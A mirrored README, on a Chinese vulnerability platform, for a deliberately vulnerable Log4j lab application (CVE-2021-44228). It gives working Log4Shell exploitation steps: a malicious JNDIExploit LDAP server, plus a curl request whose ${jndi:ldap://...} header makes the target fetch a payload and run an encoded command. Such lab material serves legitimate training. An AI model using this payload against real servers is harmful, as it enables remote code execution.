漏洞平台

POC详情： f03d66927e45dea30f25ea8755e55f23cb64d10d

来源

https://github.com/erickrr-bd/TekiumLog4jApp

关联漏洞

标题： Apache Log4j 代码问题漏洞 (CVE-2021-44228)
描述：Apache Log4j是美国阿帕奇（Apache）基金会的一款基于Java的开源日志记录工具。 Apache Log4J 存在代码问题漏洞，攻击者可设计一个数据请求发送给使用 Apache Log4j工具的服务器，当该请求被打印成日志时就会触发远程代码执行。

描述

Java application vulnerable to CVE-2021-44228

介绍

# TekiumLog4jApp v1.0

Author: Erick Rodríguez 

Email: erickrr.tbd93@gmail.com, erodriguez@tekium.mx

License: GPLv3

Application developed in Java that simulates an application vulnerable to CVE-2021-44228. 

It uses Log4j 2.11.1 and JDK 1.8.0_181.

![TekiumLog4jApp](https://github.com/erickrr-bd/TekiumLog4jApp/blob/master/screens/screen.jpg)

# Running

Run it:

`docker run --name tekiumlog4japp -p 8080:8080 d0ck3rt3k1umhub/tekiumlog4japp:v1`

Build the Docker image by yourself:

`docker build . -t tekiumlog4japp`

`docker run -p 8080:8080 --name tekiumlog4japp tekiumlog4japp`

# Exploitation Steps

<i>Note: This project is inspired by the <a href="https://github.com/christophetd/log4shell-vulnerable-app">christophetd</a> project.</i>

JNDIExploit.v1.2.zip is included in the repository as it was apparently removed from Github.

- Use <a href="https://github.com/feihong-cs/JNDIExploit/releases/download/v1.2/JNDIExploit.v1.2.zip">JNDIExploit</a> to spin up a malicious LDAP server

`unzip JNDIExploit.v1.2.zip`

`java -jar JNDIExploit-1.2-SNAPSHOT.jar -i your-private-ip -p 8888`

- Then, trigger the exploit using:

`curl 127.0.0.1:8080 -H 'X-Api-Version: ${jndi:ldap://your-private-ip:1389/Basic/Command/Base64/dG91Y2ggL3RtcC90ZWtpdW1fcHJ1ZWJhLnR4dA==}'`

- Notice the output of JNDIExploit, showing it has sent a malicious LDAP response and served the second-stage payload:

![TekiumLog4jApp](https://github.com/erickrr-bd/TekiumLog4jApp/blob/master/screens/response.jpg)

- To confirm that the code execution was successful, notice that the file /tmp/tekium_prueba.txt was created in the container running the vulnerable application:

`docker exec tekiumlog4japp ls /tmp`

# Commercial Support
![Tekium](https://github.com/unmanarc/uAuditAnalyzer2/blob/master/art/tekium_slogo.jpeg)

Tekium is a cybersecurity company specialized in red team and blue team activities based in Mexico, it has clients in the financial, telecom and retail sectors.

Tekium is an active sponsor of the project, and provides commercial support in the case you need it.

For integration with other platforms such as the Elastic stack, SIEMs, managed security providers in-house solutions, or for any other requests for extending current functionality that you wish to see included in future versions, please contact us: info at tekium.mx

For more information, go to: https://www.tekium.mx/

文件快照


 [4.0K]  /data/pocs/f03d66927e45dea30f25ea8755e55f23cb64d10d
├── [ 193]  Dockerfile
├── [ 34M]  JNDIExploit.v1.2.zip
├── [2.3K]  README.md
├── [4.0K]  screens
│   ├── [ 34K]  response.jpg
│   └── [ 61K]  screen.jpg
├── [4.0K]  TekiumLog4jApp
│   ├── [1.8K]  nbactions.xml
│   ├── [1.1K]  nb-configuration.xml
│   ├── [2.7K]  pom.xml
│   └── [4.0K]  src
│       └── [4.0K]  main
│           ├── [4.0K]  java
│           │   └── [4.0K]  com
│           │       └── [4.0K]  mycompany
│           │           └── [4.0K]  tekiumlog4japp
│           │               ├── [2.2K]  main.java
│           │               └── [1.5K]  VulnerabilityLog4j.java
│           └── [4.0K]  resources
│               └── [ 407]  log4j2.xml
└── [1.8M]  TekiumLog4jApp-1.0-SNAPSHOT.jar

9 directories, 12 files

神龙机器人已为您缓存

备注

1. 建议优先通过来源进行访问。

2. 如果因为来源失效或无法访问，请发送邮箱到 f.jinxu#gmail.com 索取本地快照（把 # 换成 @）。

3. 神龙已为您对POC代码进行快照，为了长期维护，请考虑为本地POC付费，感谢您的支持。